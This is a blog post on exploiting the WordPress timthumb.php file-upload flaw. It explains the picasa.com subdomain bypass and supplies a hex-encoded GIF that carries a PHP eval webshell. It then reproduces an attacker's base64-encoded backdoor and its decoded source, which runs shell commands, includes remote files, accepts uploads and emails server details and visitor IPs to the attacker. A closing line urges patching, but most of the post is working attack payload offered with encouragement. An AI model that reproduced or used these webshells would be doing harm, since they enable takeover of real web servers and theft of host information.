Was crawling on the Internet for the last day of 2011 and i saw someone trying to hack a wordpress website using the timthumb exploit.
Maybe you about it, maybe you don’t. Anyway, i’ll show you how to exploit the vuln
For of all you should find a wordpress using any theme having the timthumb.php
The vuln is because, the « src » parameter only check if well know website are present in the provided URL but as you can see, if you create a fake sub domain name with picasa.com (as in the example), the str_post will return a true value and allow you to upload anything.
You’ll find many information on this wordpress vulnerability
i’ll let you check sources for the bad check implementation:
Anyway, you can now upload any gif file. I’ll give you one :
\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00 \xFF\xFF\xFF\x00\x00\x00\x21\xF9\x04\x01\x00\x00\x00 \x00\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02 \x44\x01\x00\x3B\x00\x3C\x3F\x70\x68\x70\x20\x40\x65 \x76\x61\x6C\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D \x64\x27\x5D\x29\x3B\x20\x3F\x3E\x00
Here is a fake transparent gif with this PHP command : <?php @eval($_GET['cmd']) ?>
A good beginning for breaking into website :p
Let’s analyse the login.php backdoor the hacker is trying to upload on the destination website. As you see he’s located at the URL : picasa.com.thewhisperingpinesmotel.com/logIn.php
(working URL)
Here is the source :
GIF89a?????ÿÿÿ???!ù????,???????D?;? eval(base64_decode("ZWNobyAiPCEtLSB0aGUgYnVubnkgaXMgcnVubmluZyBvdmVyIHRoZSBvY2VhbiAtLT4iOw0KDQpp
ZiAoaXNzZXQgKCRfUkVRVUVTVFsiU2FrYXd0ZWFNIl0pKXsNCmluY2x1ZGUoJF9SRVFVRVNUWyJT
YWthd3RlYU0iXSk7DQpleGl0Ow0KfQ0KDQplY2hvICc8aHRtbD4NCjxsaW5rIFJFTD0iU0hPUlRD
VVQgSUNPTiIgSFJFRj0iaHR0cDovL2NhbWlsYW5rdS53YXAuc2gvUy5qcGciPg0KPHN0eWxlIHR5
cGU9InRleHQvY3NzIj4NCmJvZHkgew0KZm9udC1mYW1pbHk6Rml4ZWRzeXM7DQpmb250LXNpemU6
M3B4Ow0KY29sb3I6IzAwZmYwMDsNCkJBQ0tHUk9VTkQtQ09MT1I6ICMwMDAwMDA7DQptYXJnaW46
MHB4Ow0KcGFkZGluZzowcHg7DQp9DQp0ZXh0YXJlYSB7DQpCT1JERVI6ICAjMDBmZjAwIDFweCBz
b2xpZDsNCkJBQ0tHUk9VTkQtQ09MT1I6ICMwMDAwMDA7DQpmb250OiBGaXhlZHN5cyBib2xkOw0K
Y29sb3I6ICMwMGZmMDA7DQp9DQo8L3N0eWxlPg0KPGJvZHk+DQo8aHRtbD4NCjxkaXYgc3R5bGU9
ImJvcmRlci1ib3R0b206c29saWQgMXB4ICMwMGZmMDA7d2lkdGg6MTAwJSI+DQo8Yj5zb2Z0d2Fy
ZTo8L2I+Jm5ic3A7Jy5nZXRlbnYoIlNFUlZFUl9TT0ZUV0FSRSIpLic8YnI+DQo8Yj51bmFtZSAt
YTo8L2I+Jm5ic3A7Jy5waHBfdW5hbWUoKS4nPGJyPg0KPGI+c2FmZS1tb2RlOjwvYj4mbmJzcDsn
Ow0KDQokc2FmZW1vZGUgPSBAaW5pX2dldCgic2FmZV9tb2RlIik7IGVjaG8gKCgkc2FmZV9tb2Rl
KT8oIjxmb250IGNvbG9yPXJlZD5PTjwvZm9udD4iKTooIk9GRiIpKTsNCg0KZWNobyAnDQo8L2Rp
dj4NCjxkaXYgc3R5bGU9ImJvcmRlci1ib3R0b206c29saWQgMXB4ICMwMGZmMDA7d2lkdGg6MTAw
JSI+DQo8ZGl2IHN0eWxlPSJtYXJnaW46NnB4O21hcmdpbi1sZWZ0OjE1MHB4OyI+DQo8ZGl2IHN0
eWxlPSJmbG9hdDpsZWZ0OyBtYXJnaW4tcmlnaHQ6MTBweDsiPjxmb3JtIG1ldGhvZD0icG9zdCI+
PGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImNtZCIgc2l6ZT0iOTUiPjxpbnB1dCB0eXBlPXN1Ym1p
dCB2YWx1ZT0iRXhlYyI+PC9mb3JtPjwvZGl2Pg0KPGRpdj48Zm9ybSBlbmN0eXBlPSJtdWx0aXBh
cnQvZm9ybS1kYXRhIiBtZXRob2Q9InBvc3QiPjxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxl
Ij48aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9IlVwbG9hZCI+PC9mb3JtPjwvZGl2Pg0KPC9kaXY+
DQo8L2Rpdj4NCjxkaXYgc3R5bGU9Im1hcmdpbi1sZWZ0OjE1MHB4O21hcmdpbi10b3A6NXB4Ijs+
DQo8dGV4dGFyZWEgY29scz0iMTIxIiByb3dzPSIxNSI+JzsNCg0KaWYgKGlzc2V0ICgkX1BPU1Rb
J2NtZCddKSl7DQokY2ZlID0gJF9QT1NUWydjbWQnXTsNCiAkcmVzID0gJyc7DQogaWYgKCFlbXB0
eSgkY2ZlKSkNCiB7DQogIGlmKGZ1bmN0aW9uX2V4aXN0cygnZXhlYycpKQ0KICAgew0KICAgIEBl
eGVjKCRjZmUsJHJlcyk7DQogICAgJHJlcyA9IGpvaW4oIlxuIiwkcmVzKTsNCiAgIH0NCiAgZWxz
ZWlmKGZ1bmN0aW9uX2V4aXN0cygnc2hlbGxfZXhlYycpKQ0KICAgew0KICAgICRyZXMgPSBAc2hl
bGxfZXhlYygkY2ZlKTsNCiAgIH0NCiAgZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykp
DQogICB7DQogICAgQG9iX3N0YXJ0KCk7DQogICAgQHN5c3RlbSgkY2ZlKTsNCiAgICAkcmVzID0g
QG9iX2dldF9jb250ZW50cygpOw0KICAgIEBvYl9lbmRfY2xlYW4oKTsNCiAgIH0NCiAgZWxzZWlm
KGZ1bmN0aW9uX2V4aXN0cygncGFzc3RocnUnKSkNCiAgIHsNCiAgICBAb2Jfc3RhcnQoKTsNCiAg
ICBAcGFzc3RocnUoJGNmZSk7DQogICAgJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCiAgICBA
b2JfZW5kX2NsZWFuKCk7DQogICB9DQogIGVsc2VpZihAaXNfcmVzb3VyY2UoJGYgPSBAcG9wZW4o
JGNmZSwiciIpKSkNCiAgew0KICAgJHJlcyA9ICIiOw0KICAgd2hpbGUoIUBmZW9mKCRmKSkgeyAk
cmVzIC49IEBmcmVhZCgkZiwxMDI0KTsgfQ0KICAgQHBjbG9zZSgkZik7DQogIH0NCiB9DQogZWNo
byAkcmVzOw0KfQ0KDQoNCmlmIChpc3NldCAoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddKSl7
DQokdGVtcG5hbWUgPSAkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ107DQokbmFtZSA9ICRfRklM
RVNbJ2ZpbGUnXVsnbmFtZSddOw0KaWYoY29weSgiJHRlbXBuYW1lIiwgIiRuYW1lIikpew0KZWNo
byAiRmlsZSB1cGxvYWRlZCI7DQp9DQplbHNlIHsNCmVjaG8gIkZpbGUgbm90IHVwbG9hZGVkISI7
DQp9DQp9DQoNCmVjaG8gJzwvdGV4dGFyZWE+DQoNCjwvZGl2Pg0KPGJyPg0KPGJyPg0KPGNlbnRl
cj48aW1nIHNyYz0iaHR0cDovL2NhbWlsYW5rdS53YXAuc2gvc2FrYXcuanBnIiB3aWR0aCA9IiIg
aGVpZ2h0PSIiIC8+PC9jZW50ZXI+DQo8L2JvZHk+DQo8L2h0bWw+JzsNCiR2aXNpdG9yICAgICA9
IGdldGVudigiUkVNT1RFX0FERFIiKTsNCiRpbmplY3QgICAgID0oJF9TRVJWRVJbJ0hUVFBfSE9T
VCddIC4gJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10pOw0KJGluZm8gICAgICAgID0gKCRfU0VSVkVS
WydTRVJWRVJfU0lHTkFUVVJFJ10pOw0KJFVOYW1lICAgPSBgdW5hbWUgLWFgOw0KDQokbXNnICAg
ID0iXG4NCmh0dHA6Ly8kaW5qZWN0XG4NCiRVTmFtZVxuDQo9PT09PT09PT09PT09PT09PT09PT1c
bg0KSVAgOiAkdmlzaXRvclxuDQo9PT09PT09PT09PT09PT09PT09PT1cbiI7DQoNCg0KJHRvID0g
J2luamVrdG9ya3VAZ21haWwuY29tJzsgI2VtYWlsIGthbXUgZGlzaW5pDQokc3ViamVjdCA9ICdU
TSBzaGVsbCc7DQokbWVzc2FnZSA9ICRtc2c7DQokaGVhZGVycyA9ICR2aXNpdG9yOw0Kew0KbWFp
bCgkdG8sICRzdWJqZWN0LCAkbWVzc2FnZSwgJGhlYWRlcnMpOw0KfQ==")); ?>
and here the base64 « translated »
echo "";
if (isset ($_REQUEST["SakawteaM"])){
include($_REQUEST["SakawteaM"]);
exit;
}
echo '
software: '.getenv("SERVER_SOFTWARE").'
uname -a: '.php_uname().'
safe-mode: '; $safemode = @ini_get("safe_mode"); echo (($safe_mode)?("ON"):("OFF")); echo '

';
$visitor = getenv("REMOTE_ADDR");
$inject =($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
$info = ($_SERVER['SERVER_SIGNATURE']);
$UName = `uname -a`;
$msg ="\n
http://$inject\n
$UName\n
=====================\n
IP : $visitor\n
=====================\n";
$to = '[email protected]'; #email kamu disini
$subject = 'TM shell';
$message = $msg;
$headers = $visitor;
{
mail($to, $subject, $message, $headers);
}
You now have an idea how hacker are using timthumb vuln to hijack you wordpress installation.
I’ll explain in a later article how to find theme or plugin using the timthumb.php file.
Have fun at patching your system before a guy from SakawteaM or any other lame team deface your website :)
Happy noob year.

no comment untill now